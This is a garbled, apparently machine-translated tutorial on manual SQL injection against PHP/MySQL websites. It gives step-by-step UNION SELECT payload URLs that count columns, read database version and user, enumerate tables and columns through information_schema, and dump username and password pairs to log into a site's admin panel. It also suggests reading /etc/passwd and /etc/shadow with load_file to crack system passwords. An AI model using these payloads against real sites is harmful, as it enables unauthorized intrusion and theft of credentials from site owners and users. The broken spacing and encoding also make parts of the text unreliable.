Currently, php injection tools are not very easy to use. pangolin is always an error, so I decided to write an example of php manual injection. Manual injection uses slightly different commands and methods under different conditions. The first thing to do is to crack user information after determining the number of fields. During the injection process, if the current database connection user is root or has root permissions, you can try to use loadfile () this function is used to read files. For example, in linux, we can read/etc/passwd and/etc/shadow to brute force crack the linux Password.
In windows, we can read common files and sensitive files, such as the serv-u configuration file my. ini, and then crack the fields and fields one by one. In the second case, if the mysql version is later than 5.0 through the version () function, you can use the information_schema database that comes with mysql to query all the tables and then crack the fields and fields one by one. The worst case (few at the moment) is that the permission is not root and the database version is too low. In this case, all the tables and fields must be guessed by themselves. Without tools, it will increase the workload by dozens of times, and may not be able to guess. Next, I will introduce the mainstream mysql 5.0 and later versions using the information_schema database to query all tables for manual injection. 1. ah d scan to. Inject point http://xxxx.com/x.php? Id = x2. determine the number of fields http://xxx.com/x.php? Id = x order by 4 http://xxx.com/x.php? Id = x order by 5 order by 4 return correct page, order by 5 Return Error Page
The description field is 4, and the echo function is disabled on the website, so the physical path of the website cannot be displayed. 3. view basic information. Several functions are generally used:
Version () version database () Current database user () currently using http://xxx.com/x.php? Id = x % 20and % 201 = 2% 20 union % 20 select % ,,2, 3,4
Http://xxx.com/x.php? Id = x % 20and % 201 = 2% 20 union % 20 select % 201, version (), database (), 4
Http://www.bkjia.com/x. php? Id = x % 20and % 201 = 2% 20 union % 20 select % 201, user (), 3,4
Therefore, we can see that: User (): a0725135851 @ ww.database (): a0725135851 version (): 5.1.39-community (Mysql version> = 4.0 supports Union query Mysql> = 5.0 supports information_schema Table query ). 4. Explosion table segment http://www.myhack58.com/x.php? Id = x + and + 1 = 2 + union + select + 1, 2, table_name, 4 + from + information_schema.tables + where + table_schema = 0x6130373235313335383531 + limit +
The second table popped out is member. we add a limit0 to the end of the statement. 1 indicates that the first data is displayed. If the first data is not an administrator table, we will add a data limit 1, 1, and so on. A total of 15 tables have been tested. The previous process is relatively troublesome. Below I will introduce a simple method that can directly expose all the tables: http://xxx.com/x.php? Id = x + and + 1 = 2 + union + select + 1, 2, concat (0x7B317D, group_concat (distinct + table_name), 0x7B317D ), 4 + from + information_schema.columns + where + table_schema = 0x6130373235313335383531
We can see from the following 12 tables, which may be incomplete once. In general, all tables are first exposed. If none of them are administrator tables, the first method can only be used to crack each other.
5. From the perspective of 15 tables, the table that loads the Administrator account may be usernamehttp: // xxx.com/x.php? Id = x + and + 1 = 2 + union + select + 1, 2, group_concat (column_name), 4 + from + information_schema.columns + where + table_name = 0x757365726E616D65
The field in the username table is shown as the last 5 6. The field content http://xxx.com/x.php? Id = x and 1 = 2 union select 1, 2, group_concat (username, 0x5e, psw), 4 from username (0x5e serves as the delimiter here, and it is also possible to change to 0x23)
Log on to the background. Summary: Most of the php manual injection methods I can find on the Internet are the first and third methods I mentioned earlier. In fact, the version is very low and the database permission is root, methods cannot be reused. This tutorial is a supplement to the use of the second method.
